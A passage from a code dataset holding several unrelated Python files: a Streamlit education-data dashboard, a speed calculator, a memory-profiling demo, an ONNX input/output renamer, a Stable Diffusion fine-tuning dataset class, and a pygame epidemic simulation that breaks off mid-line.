\"FAMI_TIENECOMPUTADOR\",\n \"FAMI_TIENEINTERNET\",\n \"FAMI_TIENELAVADORA\",\n ],\n)\n\n\ndef plot_histogram(data, x):\n df = data.copy()\n df = df.sort_values(by=x, ascending=False)\n\n fig = px.histogram(df, x=x, color=\"PUNT_GLOBAL_CAT\")\n return fig\n\n\nfig2 = plot_histogram(data, histx)\ncol2.plotly_chart(fig2, use_container_width=True)\n\nst.markdown(\n \"\"\"## Heatmap de PUNT_GLOBAL_CAT (clasificación del puntaje global) vs Otras variables categóricas. \n\nLas variables categóricas habilitadas son aquellas que llegaron al modelo final.\n\n\"\"\"\n)\nheatmap_opcion = st.selectbox(\n label=\"Elige la opción de la variable a comparar con la clasificación del puntaje global\",\n options=[\n \"COLE_BILINGUE\",\n \"COLE_CALENDARIO\",\n \"COLE_JORNADA\",\n \"FAMI_EDUCACIONPADRE\",\n \"FAMI_TIENEAUTOMOVIL\",\n ],\n)\n\nst.plotly_chart(\n plot_heatmap(data, \"PUNT_GLOBAL_CAT\", heatmap_opcion), use_container_width=True\n)\n","repo_name":"JECaballeroR/MIADJECRLAB2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"123550332","text":"\r\nprint(\"Please use a ? for the unknown value\")\r\nSpeed=input(\"What is the speed?\")\r\ntime=input(\"What is the time?\")\r\nDistance=input(\"What is the distance?\")\r\nif (Speed=='?' and Distance=='?') or (Speed=='?' and time =='?') or (time=='?' and Distance=='?'):\r\n print(\"There are too many variables\")\r\nelif Speed =='?':\r\n Speed= int(Distance)/int(time)\r\n print(\"The speed is\", Speed)\r\nelif time =='?':\r\n time= int(Distance)/int(Speed)\r\n print(\"The timne is\",time)\r\nelif Distance =='?':\r\n Distance= int(Speed)*int(time)\r\n print(\"The Distance is\",Distance)\r\nelse:\r\n print(\"You have all the answers\")\r\n","repo_name":"grevutiu-gabriel/PythonPrograms","sub_path":"Distance from time and speed.py","file_name":"Distance from time and speed.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35827643261","text":"__author__ = \"jeffrey\"\n__date__ = \"$2015/7/21 上午 11:59:06$\"\n\nimport hashlib\nimport os\n\nclass MyObject(object):\n def __init__(self):\n self.x = os.urandom(20000)\n self.y = hashlib.sha1(self.x).hexdigest()\n\ndef get_data():\n values = []\n for _ in range(50):\n obj = MyObject()\n values.append(obj)\n return values\n\ndef run():\n deep_values = []\n for _ in range(50):\n deep_values.append(get_data())\n return deep_values\n\nif __name__ == \"__main__\":\n import gc\n found_objects = gc.get_objects()\n print('%d objects before' % len(found_objects))\n\n\n x = run()\n found_objects = gc.get_objects()\n print('%d objects after' % len(found_objects))\n for obj in found_objects[:3]:\n print(repr(obj)[:100])\n \n import tracemalloc\n tracemalloc.start(10) # Save up to 10 stack frames\n\n time1 = tracemalloc.take_snapshot()\n x = run()\n time2 = tracemalloc.take_snapshot()\n stats = time2.compare_to(time1, 'lineno')\n \n for stat in stats:\n print(stat)\n \n stats = time2.compare_to(time1, 'traceback')\n top = stats[0]\n print('\\n'.join(top.traceback.format()))","repo_name":"jeffreybaoshenlee/PythonArena","sub_path":"src/nerdlab/try_memory.py","file_name":"try_memory.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36535290803","text":"\"\"\"\nhttps://towardsdatascience.com/creating-editing-and-merging-onnx-pipelines-897e55e98bb0\nhttps://github.com/scailable/sclblonnx/blob/master/examples/example_05.py\n\"\"\"\n\n\nimport sclblonnx as so\n\nonnx_file = \"/home/lina/Desktop/TRITON/model_repository/yolov3/1/model.onnx\"\n\n# Open the graph. \ng = so.graph_from_file(onnx_file)\n\n# rename onnx input and output\ng = so.rename_input(g, \"input.1\", \"input\")\n\ng = so.rename_output(g, \"662\", \"output_13\")\ng = so.rename_output(g, \"715\", \"output_26\")\ng = so.rename_output(g, \"768\", \"output_52\")\n\n\ng = so.rename_output(g, \"769\", \"detections\")\n\n\n\nso.graph_to_file(g, onnx_file+\".out\")\n","repo_name":"151ali/triton-inference-server-examples","sub_path":"rename_onnx.py","file_name":"rename_onnx.py","file_ext":"py","file_size_in_byte":623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"23280789239","text":"\n\nimport random\nimport torch\n\n\n\nfrom torch.utils.data import Dataset\n\nimport PIL\n\nfrom PIL import Image\n\nimport itertools\nimport math\nimport os\nimport random\nfrom pathlib import Path\n\nfrom torchvision import transforms\n\nimport json \n\n\n\n\n# dreambooth:\n # single prompt: photo of xyz house\n # pick random from list of predefined prompts\n # image caption pairs\n # train multiple concepts jointly\n\n# textual inversion\n # pick random from list of predefined prompts\n # image caption pairs\n # train multiple concepts jointly\n\n# finetuning:\n # image caption pairs\n\n\n\n# dreambooth collate_fn output\n # batch = {\n # \"input_ids\": input_ids,\n # \"pixel_values\": pixel_values,\n # }\n # batch = {\n # \"input_ids\": input_ids,\n # \"pixel_values\": pixel_values,\n # }\n\n\n\n\n# precedence:\n# concept_list keys:\n # instance_prompt\n # instance_data_dir\n\n\n # class_prompt\n # class_data_dir\n\n\n # promptsfile each line: {\"file_name\": \"0001.png\", \"text\": \"This is a golden retriever playing with a ball\"}\n # metadata each line: {\"file_name\": \"0001.png\", \"text\": \"This is a golden retriever playing with a ball\"}\n\n\n\n# if promtsfile is None, use instance_prompt\n# if promtsfile and instance_prompt is None, use ramdom prompt from templates\n# if token is set, must be contained in instance_prompt, if instance_prompt is not set, should be contained in promptsfile (maybe if not in all, it has regularization effect)\n# for normal finetuning, only set promptsfile and instance_data_dir, everything else set to None\nconcepts_list = [\n {\n \"token\" : None, #instance_prompt must contain token (if both set), if not set, instance_prompt can contain eg rare tokens like xyz, worth trying if some prompts in promptsfile do not contain the token if it helps for preserving prior and regularization\n \"initializer_token\" : None, # only needed when adding \"token\" to embedding\n \"promptsfile\" : None, # precedence 1\n \"instance_prompt\": None, # precedence 2\n \"class_prompt\": None,\n \"instance_data_dir\":None,\n \"class_data_dir\": None,\n \"type\" : None, # one of ['style', 'object']; must be set if promptsfile and instance_prompt are not set\n \n }\n ]\n\nimagenet_templates_small = [\n \"a photo of a {}\",\n \"a rendering of a {}\",\n \"a cropped photo of the {}\",\n \"the photo of a {}\",\n \"a photo of a clean {}\",\n \"a photo of a dirty {}\",\n \"a dark photo of the {}\",\n \"a photo of my {}\",\n \"a photo of the cool {}\",\n \"a close-up photo of a {}\",\n \"a bright photo of the {}\",\n \"a cropped photo of a {}\",\n \"a photo of the {}\",\n \"a good photo of the {}\",\n \"a photo of one {}\",\n \"a close-up photo of the {}\",\n \"a rendition of the {}\",\n \"a photo of the clean {}\",\n \"a rendition of a {}\",\n \"a photo of a nice {}\",\n \"a good photo of a {}\",\n \"a photo of the nice {}\",\n \"a photo of the small {}\",\n \"a photo of the weird {}\",\n \"a photo of the large {}\",\n \"a photo of a cool {}\",\n \"a photo of a small {}\",\n]\nimagenet_style_templates_small = [\n \"a photo in the style of {}\",\n \"a rendering in the style of {}\",\n \"a cropped photo in the style of {}\",\n \"the photo in the style of {}\",\n \"a clean photo in the style of {}\",\n \"a dirty photo in the style of {}\",\n \"a dark photo in the style of {}\",\n \"a picture in the style of {}\",\n \"a cool photo in the style of {}\",\n \"a close-up photo in the style of {}\",\n \"a bright photo in the style of {}\",\n \"a cropped photo in the style of {}\",\n \"a good photo in the style of {}\",\n \"a close-up photo in the style of {}\",\n \"a rendition in the style of {}\",\n \"a nice photo in the style of {}\",\n \"a small picture in the style of {}\",\n \"a weird picture in the style of {}\",\n \"a large picture in the style of {}\",\n]\n\n\ndef get_promptsfile(file_path):\n try:\n with open(file_path, \"r\") as f:\n data = [json.loads(line) for line in f]\n except Exception as e:\n print(e)\n data = []\n return data\n\n# entry = {\"file_name\": filename, \"text\": prompt},\n\n# imagenet_style_templates_small = [\n# \"a painting in the style of {}\",\n# \"a rendering in the style of {}\",\n# \"a cropped painting in the style of {}\",\n# \"the painting in the style of {}\",\n# \"a clean painting in the style of {}\",\n# \"a dirty painting in the style of {}\",\n# \"a dark painting in the style of {}\",\n# \"a picture in the style of {}\",\n# \"a cool painting in the style of {}\",\n# \"a close-up painting in the style of {}\",\n# \"a bright painting in the style of {}\",\n# \"a cropped painting in the style of {}\",\n# \"a good painting in the style of {}\",\n# \"a close-up painting in the style of {}\",\n# \"a rendition in the style of {}\",\n# \"a nice painting in the style of {}\",\n# \"a small painting in the style of {}\",\n# \"a weird painting in the style of {}\",\n# \"a large painting in the style of {}\",\n# ]\n\n\nclass StableDiffusionDataset(Dataset):\n \"\"\"\n A dataset to prepare the instance and class images with the prompts for fine-tuning the model.\n It pre-processes the images and the tokenizes prompts.\n \"\"\"\n\n def __init__(\n self,\n concepts_list,\n tokenizer,\n with_prior_preservation=True,\n size=512,\n center_crop=False,\n num_class_images=None,\n pad_tokens=False,\n hflip=False,\n vector_shuffle=False\n ):\n self.size = size\n self.center_crop = center_crop\n self.tokenizer = tokenizer\n self.with_prior_preservation = with_prior_preservation\n self.pad_tokens = pad_tokens\n\n self.vector_shuffle = vector_shuffle\n\n self.instance_images_path = []\n self.class_images_path = []\n self.num_class_images = num_class_images\n\n if isinstance(concepts_list, str):\n try:\n with open(concepts_list, \"r\") as f:\n concepts_list = json.load(f)\n except Exception as e:\n raise ValueError(f\"concept_list is a string and cannot be opened. if concept_list is a string, there must exist a file with this filepath.\")\n \n \n\n for concept in concepts_list:\n # if promtsfile is set, use promtsfile\n # if promtsfile is None, use instance_prompt\n # if promtsfile and instance_prompt are None, use ramdom prompt from templates\n\n if concept.get(\"promptsfile\") is not None:\n promptsfile = get_promptsfile(concept[\"promptsfile\"])\n inst_img_path = [(concept[\"instance_data_dir\"].rstrip('/') + '/' +x['file_name'], x['text']) for x in promptsfile if os.path.exists(concept[\"instance_data_dir\"].rstrip('/') + '/' +x['file_name'])]\n self.instance_images_path.extend(inst_img_path)\n\n elif concept.get(\"instance_prompt\") is not None:\n if concept.get(\"token\"): \n assert concept[\"token\"] in concept[\"instance_prompt\"], 'if \"token\" and \"instance_prompt\" are set, \"instance_prompt\" must contain \"token\".'\n\n inst_img_path = [(x, concept[\"instance_prompt\"]) for x in Path(concept[\"instance_data_dir\"]).iterdir() if x.is_file()] # [('./abc.png', 'photo of xyz house'), ...]\n self.instance_images_path.extend(inst_img_path)\n\n else:\n if concept.get('type') is None:\n raise ValueError('if promptsfile and instance_prompt are not set in concept_list, \"type\" must be specified as one of [\"style\", \"object\"].')\n templates = imagenet_style_templates_small if concept['type'] == 'style' else imagenet_templates_small\n sample_prompt_from_template = lambda: random.choice(templates).format(concept[\"token\"])\n inst_img_path = [(x, sample_prompt_from_template()) for x in Path(concept[\"instance_data_dir\"]).iterdir() if x.is_file()]\n self.instance_images_path.extend(inst_img_path)\n\n if num_class_images and with_prior_preservation:\n\n class_data_dirs =[]\n for concept in concepts_list:\n if concept[\"class_data_dir\"] not in class_data_dirs:\n class_img_path = [(x, concept[\"class_prompt\"]) for x in Path(concept[\"class_data_dir\"]).iterdir() if x.is_file()] # [('./abc.png', 'photo of house'), ...]\n self.class_images_path.extend(class_img_path[:num_class_images])\n class_data_dirs.append(concept[\"class_data_dir\"])\n\n random.shuffle(self.instance_images_path)\n\n self.num_instance_images = len(self.instance_images_path)\n self._length = self.num_instance_images\n if num_class_images:\n self.num_class_images = len(self.class_images_path)\n self._length = max(self.num_class_images, self.num_instance_images)\n\n self.image_transforms = transforms.Compose(\n [\n transforms.RandomHorizontalFlip(0.5 * hflip),\n transforms.Resize(size, interpolation=transforms.InterpolationMode.BILINEAR),\n transforms.CenterCrop(size) if center_crop else transforms.RandomCrop(size),\n transforms.ToTensor(),\n transforms.Normalize([0.5], [0.5]),\n ]\n )\n\n def __len__(self):\n return self._length\n\n def __getitem__(self, index):\n example = {}\n instance_path, instance_prompt = self.instance_images_path[index % self.num_instance_images]\n instance_image = Image.open(instance_path)\n if not instance_image.mode == \"RGB\":\n instance_image = instance_image.convert(\"RGB\")\n \n example[\"instance_images\"] = self.image_transforms(instance_image)\n example[\"instance_prompt_ids\"] = self.tokenizer(\n instance_prompt,\n padding=\"max_length\" if self.pad_tokens else \"do_not_pad\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n vector_shuffle=self.vector_shuffle\n ).input_ids\n\n if self.num_class_images and self.with_prior_preservation:\n class_path, class_prompt = self.class_images_path[index % self.num_class_images]\n class_image = Image.open(class_path)\n if not class_image.mode == \"RGB\":\n class_image = class_image.convert(\"RGB\")\n example[\"class_images\"] = self.image_transforms(class_image)\n example[\"class_prompt_ids\"] = self.tokenizer(\n class_prompt,\n padding=\"max_length\" if self.pad_tokens else \"do_not_pad\",\n truncation=True,\n max_length=self.tokenizer.model_max_length,\n vector_shuffle=self.vector_shuffle\n ).input_ids\n\n return example\n\n\n\ndef collate_fn(examples, tokenizer):\n input_ids = [example[\"instance_prompt_ids\"] for example in examples]\n pixel_values = [example[\"instance_images\"] for example in examples]\n\n # Concat class and instance examples for prior preservation.\n # We do this to avoid doing two forward passes.\n if \"class_images\" in examples[0]: # with with_prior_preservation\n input_ids += [example[\"class_prompt_ids\"] for example in examples]\n pixel_values += [example[\"class_images\"] for example in examples]\n\n pixel_values = torch.stack(pixel_values)\n pixel_values = pixel_values.to(memory_format=torch.contiguous_format).float()\n\n padded_tokens = tokenizer.pad(\n {\"input_ids\": input_ids},\n padding=True,\n return_tensors=\"pt\",\n )\n\n batch = {\n \"pixel_values\": pixel_values,\n \"input_ids\": padded_tokens.input_ids,\n \"attention_mask\": padded_tokens.attention_mask,\n }\n return batch\n\n\n\n\n\n\n\nclass PromptDataset(Dataset):\n \"A simple dataset to prepare the prompts to generate class images on multiple GPUs.\"\n\n def __init__(self, prompt, num_samples):\n self.prompt = prompt\n self.num_samples = num_samples\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, index):\n example = {}\n example[\"prompt\"] = self.prompt\n example[\"index\"] = index\n return example\n\n\nclass LatentsDataset(Dataset):\n def __init__(self, latents_cache, text_encoder_cache):\n self.latents_cache = latents_cache\n self.text_encoder_cache = text_encoder_cache\n\n def __len__(self):\n return len(self.latents_cache)\n\n def __getitem__(self, index):\n return self.latents_cache[index], self.text_encoder_cache[index]\n\n\n\nclass AverageMeter:\n def __init__(self, name=None):\n self.name = name\n self.reset()\n\n def reset(self):\n self.sum = self.count = self.avg = 0\n\n def update(self, val, n=1):\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count","repo_name":"pkurzend/stable-diffusion-scripts","sub_path":"stableDiffusionDataset.py","file_name":"stableDiffusionDataset.py","file_ext":"py","file_size_in_byte":13021,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12156022619","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pygame as pg\nimport time as tm\n\n# constant definition\nCOUNTRY_LENGTH = 1000\nCOUNTRY_WIDTH = 1000\nHUMAN_RADIUS = 0.01\nQUA_RADIUS = 0.05\nEFFECTIVE_DIST = 0.1\n\n# debug\nERR_INIT_COUNTRY = \"Failed to initialise country\"\nERR_INIT_PERSON = \"Failed to initialise person\"\n\n# helper functions\ndef dist(position1, position2):\n\tdist = np.sqrt((position1[0]-position2[0])**2 + (position1[1]-position2[1])**2)\n\treturn dist\n\ndef x_y_outside(pos, wall):\n\t'''\n\tinput: pos:2d np.vector\n\twall: 4 tuple contains for the corner of the wall\n\tin the order of xmin, xmax, ymin, ymax\n\t'''\n\t(xmin,xmax,ymin,ymax) = wall\n\tx_outside = False\n\ty_outside = False\n\tif pos[0] < xmin or pos[0] > xmax:\n\t\tx_outside = True\n\tif pos[1] < ymin or pos[1] > ymax:\n\t\ty_outside = True\n\n\treturn (x_outside,y_outside)\n\ndef locate(pos, area1, area2, area3, area4):\n\tif not x_y_outside(pos,area1)[0] and not x_y_outside(pos,area1)[1]:\n\t\treturn area1\n\tif not x_y_outside(pos,area2)[0] and not x_y_outside(pos,area2)[1]:\n\t\treturn area2\n\tif not x_y_outside(pos,area3)[0] and not x_y_outside(pos,area3)[1]:\n\t\treturn area3\n\tif not x_y_outside(pos,area4)[0] and not x_y_outside(pos,area4)[1]:\n\t\treturn area4\n\nclass country:\n\n\t'''\n\tinput: name: string, restrictions: dictionary of keys\n\tbeing different restrictions and values being booleans, population: int\n\tenforement_rate: float between 0 and 1\n\tlocation: 4-tuple indicating its position on the map consists of xMin, xMax, yMin, yMax\n\t'''\n\n\tdef __init__(self, name, restrictions, population, enforement_rate, location=(-0.8,0.8,-0.8,0.8)):\n\n\t\tself.name = name\n\t\tself.restrictions = restrictions\n\t\tself.enforement_rate = enforement_rate\n\t\tself.population = population\n\n\t\t# location\n\t\tself.location = location\n\t\tcentre = [(self.location[0]+self.location[1])/2, \\\n\t\t\t\t\t\t(self.location[2]+self.location[3])/2]\n\t\tself.area1 = [self.location[0],centre[0],self.location[2],centre[1]]\n\t\tself.area2 = [centre[0],self.location[1],self.location[2],centre[1]]\n\t\tself.area3 = [self.location[0],centre[0],centre[1],self.location[3]]\n\t\tself.area4 = [centre[0],self.location[1],centre[1],self.location[3]]\n\n\t\tself.areas = [self.area1,self.area2,self.area3,self.area4]\n\n\t\t# randomly generate a bunch of people with certain size\n\t\tself.people = []\n\t\tself.create_people()\n\n\t\t# cases\n\t\tself.total = 0\n\t\tself.totals = []\n\t\tself.death = 0\n\t\tself.deaths = []\n\t\tself.daily = 0\n\t\tself.dailies = []\n\n\t\tfor person in self.people:\n\t\t\tif person.is_sick:\n\t\t\t\tself.total += 1\n\n\t\t# time\n\t\tself.day_count = 0\n\n\t\t# visualisation\n\t\tself.visualisation = AreaVisualisation(location)\n\n\tdef create_people(self):\n\t\tfor i in range(self.population):\n\t\t\tif random.random() > self.enforement_rate:\n\t\t\t\tis_legal = False\n\t\t\telse:\n\t\t\t\tis_legal = True\n\t\t\tposition = np.array([random.uniform\\\n\t\t\t(self.location[0],self.location[1]),\\\n\t\t\t random.uniform(self.location[2],self.location[3])])\n\t\t\tif i == 0:\n\t\t\t\tself.people.append \\\n\t\t\t\t(person(position, is_legal=is_legal, is_sick=True))\n\t\t\tself.people.append(person(position, is_legal=is_legal))\n\n\tdef cal_infect_rate(self, person):\n\n\t\t'''if there are sick people within dist<(), it is possible\n\t\tto get sick with base rate of (0.2), its square grows propotional to\n\t\tthe distance of the sick people'''\n\n\t\tbase_rate = 0.1\n\t\t# might not be factually accurate but doesn't matter in this case\n\n\t\tpb_infect = 0\n\t\tlocation1 = locate(person.position,self.area1,self.area2,self.area3,self.area4)\n\t\tfor person2 in self.people:\n\t\t\tif not person2.is_sick or not person2.is_alive: # also counts for the case when it's the same as person\n\t\t\t\tcontinue\n\t\t\tif locate(person2.position,self.area1,self.area2,self.area3,self.area4) \\\n\t\t\t\t!= location1:\n\t\t\t\tcontinue\n\t\t\tdis = dist(person.position,person2.position)\n\t\t\tif not dis < EFFECTIVE_DIST:\n\t\t\t\tcontinue\n\n\t\t\tif 0 == pb_infect:\n\t\t\t\tpb_infect = base_rate/(100*dis**2)\n\t\t\telse:\n\t\t\t\t# the rate of getting sick is equal to\n\t\t\t\t# 1 - the probability of not getting sick\n\t\t\t\tpb_infect = 1 - (1 - pb_infect)*(1-(base_rate/dis**2))\n\t\t\t\tif pb_infect > 1:\n\t\t\t\t\treturn 1\n\n\t\treturn pb_infect\n\n\tdef infect_people(self):\n\t\tfor person in self.people:\n\t\t\tif person.is_immune or person.is_sick:\n\t\t\t\tcontinue\n\n\t\t\tinfect_rate = self.cal_infect_rate(person)\n\t\t\tif random.random() < infect_rate:\n\t\t\t\tperson.is_sick = True\n\t\t\t\tself.total += 1\n\t\t\t\tself.daily += 1\n\t\t\t\tif random.random() > 0.05:\n\t\t\t\t\tperson.is_symptomatic = True\n\t\treturn\n\n\n\tdef detect_collision(self, person, delta):\n\t\t# hits people\n\t\tif not person.is_quarantined:\n\t\t\tfor person2 in self.people:\n\t\t\t\tif not person2.is_alive:\n\t\t\t\t\tcontinue\n\t\t\t\tif person2 != person and \\\n\t\t\t\tdist(person.position, person2.position) <= \\\n\t\t\t\t1.2*(person.radius+person2.radius):\n\t\t\t\t\t\tperson.update_velocity(person2)\n\n\t\t\t# hits wall\n\n\t\t\tnext_pos = person.position + person.velocity*delta\n\n\t\t\t# area_restrictions\n\t\t\tif self.restrictions['area_restrictions']:\n\t\t\t\tif random.random() < self.enforement_rate:\n\t\t\t\t\tarea_wall = locate(person.position,self.area1,self.area2,self.area3,self.area4)\n\t\t\t\t\tx_out,y_out = x_y_outside(next_pos, area_wall)\n\t\t\t\telse:\n\t\t\t\t\tx_out,y_out = x_y_outside(next_pos, self.location)\n\t\t\telse:\n\t\t\t\tx_out,y_out = x_y_outside(next_pos, self.location)\n\n\t\t\tif x_out:\n\t\t\t\tperson.velocity = np.array([-person.velocity[0],person.velocity[1]])\n\t\t\tif y_out:\n\t\t\t\tperson.velocity = np.array([person.velocity[0],-person.velocity[1]])\n\n\t\treturn\n\n\tdef apply_restrictions(self):\n\n\t\tif self.restrictions['quarantine']:\n\t\t\tfor person in self.people:\n\t\t\t\tif person.is_legal:\n\t\t\t\t\tif person.is_quarantined and not person.is_sick:\n\t\t\t\t\t\tperson.is_quarantined = False\n\t\t\t\t\t\tperson.radius = HUMAN_RADIUS\n\n\t\t\t\t\tif person.is_symptomatic:\n\t\t\t\t\t\tperson.is_quarantined = True\n\t\t\t\t\t\t# person.radius = QUA_RADIUS\n\n\t\tif self.restrictions['reduce_travelling']:\n\t\t\tself.restrictions['reduce_travelling'] = False\n\t\t\tfor person in self.people:\n\t\t\t\tif person.is_legal:\n\t\t\t\t\tperson.velocity *= 0.2\n\n\t\tif self.restrictions['area_restrictions']:\n\t\t\tfor area in self.areas:\n\t\t\t\tAreaVisualisation(area).Draw()\n \n\n\tdef update_people(self, delta):\n\t\tself.apply_restrictions()\n\t\tfor person in self.people:\n\t\t\tif person.is_alive:\n\t\t\t\tself.detect_collision(person, delta)\n\t\t\tdeath_count, recorver_count = person.update(delta)\n\t\t\tself.death += death_count\n\t\t\tself.total -= (death_count+recorver_count)\n\n\tdef update_data(self):\n\t\tcount = 1\n \n\t\tif not count // 5:\n\t\t\tself.day_count += 1\n\t\t\tprint(self.daily)\n\t\t\tself.dailies.append(self.daily)\n\t\t\tself.totals.append(self.total)\n\t\t\tself.deaths.append(self.death)\n\t\t\tself.daily = 0\n\n\tdef update(self, delta):\n\t\tself.infect_people()\n\t\tself.update_people(delta)\n\n\t\tfor person in self.people:\n\t\t\tperson.draw()\n\n\t\tself.update_data()\n\n\n\tdef plot_cases_vs_time(self):\n\t\ttimes = np.arange(self.day_count)\n\n\t\tfig, cases = plt.subplots(3)\n\t\tfig.suptitle('Cases vs Time(days)')\n\n\t\tcases[0].plot(times, self.totals, label='total vs times')\n\t\tcases[0].set_title('total vs times')\n\n\t\tcases[1].plot(times, self.dailies,label='daily vs times')\n\t\tcases[1].set_title('daily vs times')\n\n\t\tcases[2].plot(times, self.deaths, label='deaths vs times')\n\t\tcases[2].set_title('death vs times')\n\n\t\tplt.legend()\n\t\tplt.show()\n\n\tdef draw(self):\n\n\t\tself.visualisation.Draw()\n\nclass person:\n\n\t'''type of input: location: string, age: int pb_travel:\n\tfloat in [0,1], travel_des: string (name of a country in the country dictionary)\n\tall is_ variables should be booleans\n\t'''\n\n\tdef __init__(self, position,\n\tis_legal=True, is_sick=False, radius=HUMAN_RADIUS):\n\n\t\tself.position = position\n\n\t\tself.speed = 0.2\n\t\tx = random.uniform(-self.speed,self.speed)\n\t\tabs_y = np.sqrt(self.speed**2-x**2)\n\t\ty = random.choice([-abs_y,abs_y])\n\t\tself.velocity = np.array([x,y])\n\n\t\tself.age = random.normalvariate(45, 14)\n\t\tself.is_legal = is_legal\n\t\tself.radius = radius\n\n\t\t# health statues\n\t\tself.is_alive = True # healthy ppl white\n\t\tself.is_sick = is_sick\n\t\tif is_sick:\n\t\t\tself.is_symptomatic = True\n\t\telse:\n\t\t\tself.is_symptomatic = False\n\t\tself.days_since_infected = 0\n\t\tself.is_quarantined = False # speed = 0\n\n\t\t# yellow for sick but not is_symptomatic n red otherwise\n\t\t# self.pb_die_today = 0 # float between 0 and 1\n\t\tself.is_immune = False # green\n\n\t\t# visualisation\n\t\tself.colour = self.find_colour()\n\t\tself.visualisation = PersonVisualisation(self.colour)\n\n\tdef update_health(self,delta):\n\n\t\t''' people might die or recorver the probability of recovering\n\t\ton their age and how long they have been sick for'''\n\n\t\tdeath_count = 0\n\t\trecorver_count = 0\n\t\tif self.is_alive and self.is_sick :\n\n\t\t\tself.days_since_infected += 0.2\n\t\t\tif self.is_symptomatic:\n\t\t\t\tif self.age < 40:\n\t\t\t\t\tif random.random() < 0.0002:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 50:\n\t\t\t\t\tif random.random() < 0.001:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 60:\n\t\t\t\t\tif random.random() < 0.0014:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telif self.age < 70:\n\t\t\t\t\tif random.random() < 0.0018:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\t\t\t\telse:\n\t\t\t\t\tif random.random() < 0.00296:\n\t\t\t\t\t\tself.is_alive = False\n\t\t\t\t\t\tdeath_count +=1\n\n\t\t\telif self.days_since_infected > 14:\n\t\t\t\tself.is_symptomatic = True\n\n\t\t\tif self.days_since_infected >= 21:\n\t\t\t\tif random.random() < 0.1:\n\t\t\t\t\tself.is_sick = False\n\t\t\t\t\tself.is_immune = True\n\t\t\t\t\trecorver_count += 1\n\t\t\t\t\tself.is_symptomatic = False\n\n\t\treturn death_count, recorver_count\n\n\tdef update_velocity(self, another):\n\t\tself.velocity[0] = -another.velocity[0]\n\t\tself.velocity[1] = -another.velocity[1]\n\n\tdef update_position(self, delta):\n\t\tif self.is_quarantined or not self.is_alive:\n\t\t\treturn\n\t\tself.position += delta*self.velocity\n\n\tdef update(self, delta):\n\n\t\tself.update_position(delta)\n\t\tdeath_count,recorver_count = self.update_health(delta)\n\t\t# visualisation\n\t\tself.colour = self.find_colour()\n\t\tself.visualisation = PersonVisualisation(self.colour)\n\n\t\treturn death_count, recorver_count\n\tdef find_colour(self):\n\n\t\tcolour = [255,255,255]\n\n\t\tif not self.is_alive:\n\t\t\treturn [100,20,100]\n\n\t\tif self.is_sick:\n\n\t\t\tif self.is_quarantined:\n\t\t\t\tcolour = [0,0,255]\n\t\t\telif self.is_symptomatic:\n\t\t\t\tcolour = [255,0,0]\n\t\t\telse:\n\t\t\t\tcolour = [255,255,0]\n\t\telif self.is_immune:\n\t\t\tcolour = [0,255,0]\n\n\t\treturn colour\n\n\tdef draw(self):\n\n\t\tself.visualisation.Draw(self.position, HUMAN_RADIUS)\n\n# the following code has been taken and modified from lab2Visualisation.py\n\nresolution = 800\n\ndef Execute(updateFunction, runTime):\n\n\t'''\n\tinput: updateFunction: callable function,\n\trunTime: time in seconds of how long the pygame window should run for\n\t'''\n\n\tglobal window\n\tresolution = 800 \n\n\twindow = pg.display.set_mode((int(resolution*2),resolution))\n\twindow.fill([0,0,0])\n\n\tlastFrameTime = tm.process_time()\n\ttotalTime = 0\n\twhile totalTime < runTime:\n\n\t\ttimeStep = tm.process_time() - lastFrameTime\n\n\t\tlastFrameTime = tm.process_time()\n\n\t\twindow.fill([0,0,0])\n\n\t\t# print(timeStep)\n\t\tupdateFunction(timeStep)\n\n\t\tpg.display.update()\n\t\ttotalTime += timeStep\n\n\tpg.display.quit()\n\nclass PersonVisualisation:\n\n\tdef __init__(self, colour=[255,255,255]):\n\t\tself.colour = colour\n\t\tself.pixelPos = [400,400]\n\t\tself.pixelRad = 0\n\n\tdef Draw(self, position, radius):\n\n\t\tself.pixelRad = round(resolution*radius/2.0)\n\n\t\tself.pixelPos = [int(round(resolution*(position[0] + 1.0)/2.0)),\n\t\t int(round(resolution*(position[1] + 1.0)/2.0))]\n\n\t\tpg.draw.circle(window,self.colour,self.pixelPos,self.pixelRad)\n\nclass AreaVisualisation:\n\n\tdef __init__(self, location, colour=[255,255,255]):\n\t\tself.colour = colour\n\n\t\t(xMin, xMax, yMin, yMax) = location\n\t\tself.topRightX = round(resolution*(xMin + 1.0)/2.0)\n\t\tself.topRightY = round(resolution*(yMin + 1.0)/2.0)\n\t\tself.width = round(resolution*(xMax-xMin)/2.0)\n\t\tself.height = round(resolution*(yMax-yMin)/2.0)\n\n\tdef Draw(self):\n\n\t\tpg.draw.rect(window,self.colour,[self.topRightX,self.topRightY,self.width, self.height],1)\n\n\ndef update_world(delta):\n\t'''updates the entire world for each time step delta'''\n\n\tfor c in countries:\n\t\tc.draw()\n\tfor c in countries:\n\t\tc.update(delta)\n\n\n# intialise the world\n# default restrictions\n\nno_res = {'quarantine': False, 'reduce_travelling': False, 'area_restrictions': False}\nquarantine = {'quarantine': True, 'reduce_travelling': False, 'area_restrictions': False}\nred_tra = {'quarantine': False, 'reduce_travelling': True, 'area_restrictions': False}\narea_res = {'quarantine': False, 'reduce_travelling': False, 'area_restrictions': True}\nall = {'quarantine': True, 'reduce_travelling': True, 'area_restrictions': True}\nc1 = country('country1',no_res, 200, 0, 